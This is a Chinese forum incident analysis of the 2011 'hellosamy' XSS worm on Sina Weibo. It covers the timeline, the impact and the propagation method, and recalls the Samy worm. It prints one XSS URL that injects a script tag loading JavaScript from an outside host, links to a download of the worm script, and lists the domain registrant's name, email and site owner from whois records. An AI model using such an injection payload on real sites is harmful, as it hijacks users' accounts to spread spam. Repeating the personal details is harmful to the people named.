新浪微博攻击事件分析
一、事件的经过<br><br>
新浪微博突然出现大范围“中毒”,大量用户自动发送“建党大业中穿帮的地方”、“个税起征点有望提到4000”、“郭美美事件的一些未注意到的细节”、“3D肉团团高清普通话版种子”等带链接的微博与私信,并自动关注一位名为hellosamy的用户。<br>
<br>
事件的效果:<br>
<img id="aimg_61" src="http://bbs.unnoo.com/datahttp://blog.chinaunix.net/attachment/forum/201106/28/213035yd8yj9yzj9yy3ksq.png" class="zoom" alt="1.png" title="1.png" width="600">
<br>
<br>
和<br>
<img id="aimg_60" src="http://bbs.unnoo.com/datahttp://blog.chinaunix.net/attachment/forum/201106/28/213008s8sooszz8lhzfpos.png" class="zoom" alt="4.png" title="4.png" width="600">
<br>
<br>
事件的经过线索如下:<br>
<br>
20:14,开始有大量带V的认证用户中招转发蠕虫<br>
20:30,2kt.cn中的病毒页面无法访问<br>
20:32,新浪微博中hellosamy用户无法访问<br>
21:02,新浪漏洞修补完毕<br>
<br>
影响有多大:32961(这位hellosamy在帐号被封前的好友数量)。<br>
<img id="aimg_62" src="http://bbs.unnoo.com/datahttp://blog.chinaunix.net/attachment/forum/201106/28/2134244rfkxrrannrswoir.jpg" class="zoom" alt="5.jpg" title="5.jpg" width="440">
<br>
<br>
二、采用了什么样的攻击方法<br>
<br>
1、利用了新浪微博存在的XSS漏洞;<br>
<br>
2、使用有道提供的短域名服务(这些网址目前已经“无害”);<br>
<br>
例如,通过http://163.fm/PxZHoxn,将链接指向:<br>
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update<br>
<br>
3、当新浪登陆用户不小心访问到相关网页时,由于处于登录状态,会运行这个js脚本做几件事情:<br>
<br>
a.发微博(让更多的人看到这些消息,自然也就有更多人受害);<br>
b.加关注,加uid为2201270010的用户关注——这应该就是大家提到的hellosamy了;<br>
c.发私信,给好友发私信传播这些链接;<br>
<br>
三、攻击者是谁?<br>
<br>
攻击者不一定是2kt.cn的拥有者。目前暂时只能获得2kt.cn域名、网站拥有者信息如下。<br>
不排除这个网站被攻击后,服务器被人放置恶意代码。<br>
<br>
通过whois查询,2kt.cn的域名拥有者信息如下:<br>
<br>
注册人: 张志<br>
管理员邮件:lin5061@gmail.com<br>
<br>
通过工信部的备案查询:http://www.miibeian.gov.cn/publish/query/indexFirst.action<br>
<br>
网站负责人姓名:刘孝德<br>
网站备案/许可证号:苏ICP备10108026号-1<br>
<br>
四、为什么叫hellosamy?<br>
<br>
2005年,首个利用跨站点脚本缺陷的蠕虫samy被“创造”出来了。Samy利用网站设计方面的缺陷,创建了一份“恶意”的用户档案,当该用户档案被浏
览时,就会自动地激活代码,将用户添加到Samy的“好友”列表中。另外,恶意代码还会被拷贝到用户的档案中,当其他人查看用户的档案时,蠕虫会继续传
播。Samy蠕虫能够造成与拒绝服务相当的效应,会造成好友列表中好友数量呈指数级增长,最终会消耗系统的大量资源。<br>
<br>
因此,这次新浪微博的蠕虫,象是在对samy蠕虫致敬 <img src="http://bbs.unnoo.com/static/image/smiley/default/smile.gif" alt="" border="0"><br>
<br>
五、参考信息<br>
<br>
samy蠕虫的传播经历与技术细节:http://namb.la/popular,http://namb.la/popular/tech.html<br>
新浪hellosamy蠕虫的传播与细节:http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2<br>
<br>
六、本次蠕虫事件中的代码下载<br>
<br>
t.js下载地址:
<img src="http://bbs.unnoo.com/static/image/filetype/zip.gif" class="vm" alt="" border="0">
<a href="http://bbs.unnoo.com/forum.php?mod=attachment&aid=NTl8OGQ2ZDM1MGZ8MTMwOTMxMTYxOXwwfDE1Ng%3D%3D" target="_blank" target="_blank">06.28_sina_XSS.txt.zip</a><br><br>原文:<a href="http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2" target="_blank">http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2</a><br>
页:
[1]